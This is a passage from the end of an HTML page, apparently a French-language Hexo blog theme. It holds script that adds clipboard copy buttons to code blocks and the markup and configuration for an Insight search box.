          copyButton.addClass('clipboard-btn');
          copyButton.attr('data-clipboard-target-id', codeId);

          var figcaption = figure.querySelector('figcaption');

          if (figcaption) {
            figcaption.append(copyButton[0]);
          } else {
            figure.prepend(copyButton[0]);
          }
        })

        var clipboard = new ClipboardJS('.clipboard-btn', {
          target: function(trigger) {
            return document.getElementById(trigger.getAttribute('data-clipboard-target-id'));
          }
        });
        clipboard.on('success', function(e) {
          e.clearSelection();
        })
      })
    </script>

    


<script src="/js/script.js"></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-mask"></div>
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="Que voulez-vous chercher ?">
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: 'Posts',
                PAGES: 'Pages',
                CATEGORIES: 'Catégories',
                TAGS: 'Tags',
                UNTITLED: '(Sans Titre)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js"></script>
    
</body>
</html>